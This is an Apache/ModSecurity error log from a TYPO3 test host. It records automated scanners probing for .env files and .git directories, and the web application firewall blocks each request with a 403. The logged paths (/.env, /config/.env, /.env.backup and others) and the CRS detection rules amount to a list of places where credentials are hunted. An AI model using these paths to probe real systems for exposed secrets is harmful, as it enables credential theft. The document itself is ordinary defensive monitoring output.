[Wed Oct 08 23:53:29.472597 2025] [:error] [pid 3325141] [client 197.238.32.139:62236] [client 197.238.32.139] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aObdWUzJhLpqvtTEaynS7AAAAAk"]
[Wed Oct 08 23:53:29.472762 2025] [:error] [pid 3325141] [client 197.238.32.139:62236] [client 197.238.32.139] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aObdWUzJhLpqvtTEaynS7AAAAAk"]
[Sat Oct 11 00:45:48.404448 2025] [authz_core:error] [pid 3390474] [client 195.178.110.130:54908] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Oct 12 12:17:27.416613 2025] [:error] [pid 3416917] [client 176.65.149.195:42828] [client 176.65.149.195] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOuAN8Zbqndn-3W8wrfBhAAAAAU"]
[Sun Oct 12 12:17:27.416855 2025] [:error] [pid 3416917] [client 176.65.149.195:42828] [client 176.65.149.195] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOuAN8Zbqndn-3W8wrfBhAAAAAU"]
[Sun Oct 12 12:17:27.416998 2025] [:error] [pid 3416917] [client 176.65.149.195:42828] [client 176.65.149.195] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOuAN8Zbqndn-3W8wrfBhAAAAAU"]
[Sun Oct 12 15:13:04.396319 2025] [authz_core:error] [pid 3416894] [client 185.177.72.24:53800] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Oct 12 15:13:04.520159 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOupYMZbqndn-3W8wrfB5QAAAAU"]
[Sun Oct 12 15:13:04.520379 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOupYMZbqndn-3W8wrfB5QAAAAU"]
[Sun Oct 12 15:13:04.520535 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOupYMZbqndn-3W8wrfB5QAAAAU"]
[Sun Oct 12 15:13:04.549969 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aOupYMZbqndn-3W8wrfB5gAAAAU"]
[Sun Oct 12 15:13:04.550173 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aOupYMZbqndn-3W8wrfB5gAAAAU"]
[Sun Oct 12 15:13:04.550335 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aOupYMZbqndn-3W8wrfB5gAAAAU"]
[Sun Oct 12 15:13:04.579895 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aOupYMZbqndn-3W8wrfB5wAAAAU"]
[Sun Oct 12 15:13:04.580105 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aOupYMZbqndn-3W8wrfB5wAAAAU"]
[Sun Oct 12 15:13:04.580279 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aOupYMZbqndn-3W8wrfB5wAAAAU"]
[Sun Oct 12 15:13:04.609957 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aOupYMZbqndn-3W8wrfB6AAAAAU"]
[Sun Oct 12 15:13:04.610158 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aOupYMZbqndn-3W8wrfB6AAAAAU"]
[Sun Oct 12 15:13:04.610321 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aOupYMZbqndn-3W8wrfB6AAAAAU"]
[Sun Oct 12 15:13:04.639900 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aOupYMZbqndn-3W8wrfB6QAAAAU"]
[Sun Oct 12 15:13:04.640089 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aOupYMZbqndn-3W8wrfB6QAAAAU"]
[Sun Oct 12 15:13:04.640245 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aOupYMZbqndn-3W8wrfB6QAAAAU"]
[Sun Oct 12 15:13:04.670830 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aOupYMZbqndn-3W8wrfB6gAAAAU"]
[Sun Oct 12 15:13:04.671013 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aOupYMZbqndn-3W8wrfB6gAAAAU"]
[Sun Oct 12 15:13:04.671182 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aOupYMZbqndn-3W8wrfB6gAAAAU"]
[Sun Oct 12 15:13:04.702220 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aOupYMZbqndn-3W8wrfB6wAAAAU"]
[Sun Oct 12 15:13:04.702722 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aOupYMZbqndn-3W8wrfB6wAAAAU"]
[Sun Oct 12 15:13:04.702879 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aOupYMZbqndn-3W8wrfB6wAAAAU"]
[Sun Oct 12 15:13:04.731934 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aOupYMZbqndn-3W8wrfB7AAAAAU"]
[Sun Oct 12 15:13:04.732091 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aOupYMZbqndn-3W8wrfB7AAAAAU"]
[Sun Oct 12 15:13:04.732274 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aOupYMZbqndn-3W8wrfB7AAAAAU"]
[Sun Oct 12 15:13:04.732457 2025] [:error] [pid 3416917] [client 185.177.72.24:53810] [client 185.177.72.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aOupYMZbqndn-3W8wrfB7AAAAAU"]
[Fri Oct 17 19:56:08.488992 2025] [authz_core:error] [pid 3543377] [client 34.125.115.202:38308] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Oct 18 11:19:27.485936 2025] [authz_core:error] [pid 3573535] [client 195.178.110.159:50856] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Oct 18 11:19:27.592657 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPNbn98apFXlzKHq-dGauQAAAAc"]
[Sat Oct 18 11:19:27.592876 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPNbn98apFXlzKHq-dGauQAAAAc"]
[Sat Oct 18 11:19:27.593031 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPNbn98apFXlzKHq-dGauQAAAAc"]
[Sat Oct 18 11:19:27.616462 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aPNbn98apFXlzKHq-dGaugAAAAc"]
[Sat Oct 18 11:19:27.616644 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aPNbn98apFXlzKHq-dGaugAAAAc"]
[Sat Oct 18 11:19:27.616817 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aPNbn98apFXlzKHq-dGaugAAAAc"]
[Sat Oct 18 11:19:27.640062 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aPNbn98apFXlzKHq-dGauwAAAAc"]
[Sat Oct 18 11:19:27.640232 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aPNbn98apFXlzKHq-dGauwAAAAc"]
[Sat Oct 18 11:19:27.640381 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aPNbn98apFXlzKHq-dGauwAAAAc"]
